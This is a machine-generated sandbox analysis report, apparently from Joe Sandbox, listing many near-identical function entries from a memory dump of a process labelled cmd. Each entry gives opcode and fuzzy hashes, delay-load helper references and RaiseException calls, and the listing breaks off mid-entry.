Opcode ID: a49864c002fb43b24666e9263377a5e81e3ed5e4077056ab9637df9f6e6574b0
Instruction ID: cac723327db62b2cec972db447c46deb79804aaab95613adc8b391d2d472f457
Opcode Fuzzy Hash: a49864c002fb43b24666e9263377a5e81e3ed5e4077056ab9637df9f6e6574b0
Instruction Fuzzy Hash: 0DB012D935B1406C3008D14F9D12E3F018CC4D5E113208D3EF124CD151F5404FC00071

Uniqueness

Uniqueness Score: -1.00%

Function 030421CB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 3062c868f1928a38bb108306fa58b78e2b6c7708b50217d27660bc8e23e832f1
Instruction ID: 70a379bf4b4798a4299b56d57956d15452d823ecf07c86571066f815159d1a6a
Opcode Fuzzy Hash: 3062c868f1928a38bb108306fa58b78e2b6c7708b50217d27660bc8e23e832f1
Instruction Fuzzy Hash: 41B012D935B1446C3018D14F9D12F3F018CC9D5E12320CD3EF420CD011F5404F840071

Uniqueness

Uniqueness Score: -1.00%

Function 03042414 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 5b13618b52000f2944d44bab40292c4c0fc179a95f66bb736c0454bb97230f7a
Instruction ID: 857d458e52f9580dfca6aac935fbc499eda3d2117044c0cab6f0dbb53babfcb4
Opcode Fuzzy Hash: 5b13618b52000f2944d44bab40292c4c0fc179a95f66bb736c0454bb97230f7a
Instruction Fuzzy Hash: 88B012DD36F1006D3048E14B9D11F3F019CC0C0D223304C7AF420C8001F5800F8000B2

Uniqueness

Uniqueness Score: -1.00%

Function 0304241E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 655795e49613815e9fa2bb027d30a330eab62d24929a83d3839b04320b6d8a46
Instruction ID: 43da4b34b5dbaefd726f3d05cb0f120ef44ac20ecb47a82f46f442f36cb19d46
Opcode Fuzzy Hash: 655795e49613815e9fa2bb027d30a330eab62d24929a83d3839b04320b6d8a46
Instruction Fuzzy Hash: 15B012DD36F1006C3048D14B9E01F3F019CC0D0D1233088BEF420C8081F5800F8100F1

Uniqueness

Uniqueness Score: -1.00%

Function 03042432 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 3fdb0ed04d6c4bdfca556124c3a789ad2cdd71be816f3fa2d72a4b9e9c5379da
Instruction ID: b3bcc30664b69f73b901704374124ac3671216d25ff82c9ba068ba3e3467d79b
Opcode Fuzzy Hash: 3fdb0ed04d6c4bdfca556124c3a789ad2cdd71be816f3fa2d72a4b9e9c5379da
Instruction Fuzzy Hash: E6B012DD36F1016C3049D14B9D01F3F019CC0D0D12330C87EF820C9041F5800F8400B1

Uniqueness

Uniqueness Score: -1.00%

Function 03042450 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: bbaa75839775d0db4c9851e53618c55ed82c0767712189d526dc97d8f75e0cda
Instruction ID: 8647c5430f976762a1d668f07591120e53e43c97bb6b6d7d6a14ab157ad8575c
Opcode Fuzzy Hash: bbaa75839775d0db4c9851e53618c55ed82c0767712189d526dc97d8f75e0cda
Instruction Fuzzy Hash: D2B012DD36F2006C3058E14B9D01F3F019CC0C0D13330497AF420C8001F5800FC001B1

Uniqueness

Uniqueness Score: -1.00%

Function 0304249A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03042491

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 43b398a1dabfe39161217fd349d9e7311a78922decb041a7063189560abb251c
Instruction ID: 29c2c10d07aefd59fc159d88e8eddc42ea3f8c2de05d5cc2b6e4f93c37d7a1f1
Opcode Fuzzy Hash: 43b398a1dabfe39161217fd349d9e7311a78922decb041a7063189560abb251c
Instruction Fuzzy Hash: 85B012ED36B102AC3018E197BE01F3F018CC0C4D51320897AF420C8101EA800F440171

Uniqueness

Uniqueness Score: -1.00%

Function 030423D6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: c3e45e177d4e1e508aceb56ad63df81bf15cc632e7bffd4465b31e70db0d1007
Instruction ID: cbe3d86f97281faf192799e2b8d458eac4830cdd74afd248b3ff4ec5a16aaffc
Opcode Fuzzy Hash: c3e45e177d4e1e508aceb56ad63df81bf15cc632e7bffd4465b31e70db0d1007
Instruction Fuzzy Hash: D6A001EE6AB2417C7158E297AE26E7F026DC4D1A227308DBAF82198452B8801B8500B5

Uniqueness

Uniqueness Score: -1.00%

Function 030423F1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030423E3

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 061bcdd1310a6e56905a5dc1885fb7ad1b365ed7f55ed702a12d93b0c367ba23
Instruction ID: c6c7f5222ff95967bf886f95e50967657e7bf9098e3718fd18783992b40f15be
Opcode Fuzzy Hash: 061bcdd1310a6e56905a5dc1885fb7ad1b365ed7f55ed702a12d93b0c367ba23
Instruction Fuzzy Hash: C6A002DD66F1417C7158D1575D15E7F015DC4D59527304D79F41188051B4801B850075

Uniqueness

Uniqueness Score: -1.00%

Function 03042202 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 890c1f05eb95bed9a27a4dc28f02e4aab3eaa5da7ff5df7ac0624336d5d4fe66
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 890c1f05eb95bed9a27a4dc28f02e4aab3eaa5da7ff5df7ac0624336d5d4fe66
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 0304220C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ddbdd36da0a98928e59e275ca5df6aad095a1242fb48d4500a2447547f03aa1b
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: ddbdd36da0a98928e59e275ca5df6aad095a1242fb48d4500a2447547f03aa1b
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 03042220 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 91002531a61ac3fb6987ba3daff88a21b642b443354a17c8f056ed85be1783b1
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 91002531a61ac3fb6987ba3daff88a21b642b443354a17c8f056ed85be1783b1
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 0304222A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ed6dae242eef85fe1d447f3d8d731a03ae387778f0b44a953beb46189d0cf535
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: ed6dae242eef85fe1d447f3d8d731a03ae387778f0b44a953beb46189d0cf535
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 03042248 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 76bcf8fc199165f5dc60b6f4037156dc24855f98d71f2ebe18cb5600671bcfd6
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 76bcf8fc199165f5dc60b6f4037156dc24855f98d71f2ebe18cb5600671bcfd6
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 0304225C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f00d3a739a88d714829dce4634fe33e3abe739f0eac5387bece99673fa8c2387
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: f00d3a739a88d714829dce4634fe33e3abe739f0eac5387bece99673fa8c2387
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 03042266 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 72d58649035448519f9d6aedd91c58e2ba86285fad76c06ddcd39b69b628c36a
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 72d58649035448519f9d6aedd91c58e2ba86285fad76c06ddcd39b69b628c36a
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 03042270 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 70612965463da9537a1ef1dc02ef056ec6d22d94ff4362e82de1a7ef0f6c93c1
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 70612965463da9537a1ef1dc02ef056ec6d22d94ff4362e82de1a7ef0f6c93c1
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 0304227A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 01e3794c812ff13dc256648c657bdf839fde07b993c4035bd5b8f7c6e37f000b
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 01e3794c812ff13dc256648c657bdf839fde07b993c4035bd5b8f7c6e37f000b
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 03042284 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: fd48ccc96c897cf502db81fba80462094d81b1c35c187263e554844bbddd5fab
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: fd48ccc96c897cf502db81fba80462094d81b1c35c187263e554844bbddd5fab
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 0304228E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 68e869213652b39db1e57f1931e15422e9e78f8030d47f3edf8ab2eec18be6f7
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 68e869213652b39db1e57f1931e15422e9e78f8030d47f3edf8ab2eec18be6f7
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 03042298 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2746e127f0253a71403c524ee88b27a5b94d4b53058831ca3462a7ac1affe5af
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 2746e127f0253a71403c524ee88b27a5b94d4b53058831ca3462a7ac1affe5af
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 03042197 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 98fa9948268344d71384c246b92950c99faf81ed092124a73f60e49026a79b80
Instruction ID: 0d2f74c0c25a6e44b3931f9ac78e8cde85279e3e436a1d12ec909ac2f1f2d5cc
Opcode Fuzzy Hash: 98fa9948268344d71384c246b92950c99faf81ed092124a73f60e49026a79b80
Instruction Fuzzy Hash: E5A002D92572417C7118E1575D16D7F055CC4D5A113214979F55599052B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 030421B2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: ed0986bda01733a6eefa1ec1baf30bef9d722a6ce3f111a0dd34431fa82e890e
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: ed0986bda01733a6eefa1ec1baf30bef9d722a6ce3f111a0dd34431fa82e890e
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 030421C6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 356bec445697a1dcec87b81c4ac1c97a7b0b1d9598383cb60591eb46f7be0676
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 356bec445697a1dcec87b81c4ac1c97a7b0b1d9598383cb60591eb46f7be0676
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 030421DA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 08d285010c7bed6d727ad297ce593d91fba58e0f065f775625982743ce899ae7
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 08d285010c7bed6d727ad297ce593d91fba58e0f065f775625982743ce899ae7
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 030421E4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: b7e001950f2c11bbc8ea66ab6667a9b4a45c9aed45f6640644795cbc62047bf8
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: b7e001950f2c11bbc8ea66ab6667a9b4a45c9aed45f6640644795cbc62047bf8
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 030421EE Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 0c7aad2b40a5e6c8d649d743715e2f889069d75fec0416bb4bd992d69b7b1fb9
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 0c7aad2b40a5e6c8d649d743715e2f889069d75fec0416bb4bd992d69b7b1fb9
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 030421F8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 030421A4

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_3021000_cmd.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 24bbbd120245fbd72a62c2f42479736db5b2ff9a0909177e330eb2476d7a89e2
Instruction ID: 8e9b8ffc519820b97f3285398bcda50d0034154748c3d2cba2af708020ae7ade
Opcode Fuzzy Hash: 24bbbd120245fbd72a62c2f42479736db5b2ff9a0909177e330eb2476d7a89e2
Instruction Fuzzy Hash: CCA002D925B1417C7118D1575D16D7F015CC4D5A513214D79F55189051B4405B854071

Uniqueness

Uniqueness Score: -1.00%

Function 03041D63 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 03041D70

Part of subcall function 03041EC3: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,?,03020000), ref: 03041F3C

Memory Dump Source

Source File: 00000023.00000002.684491100.0000000003021000.00000020.80000000.00040000.00000000.sdmp, Offset: 03021000, based on PE: false

Joe Sandbox IDA Plugin

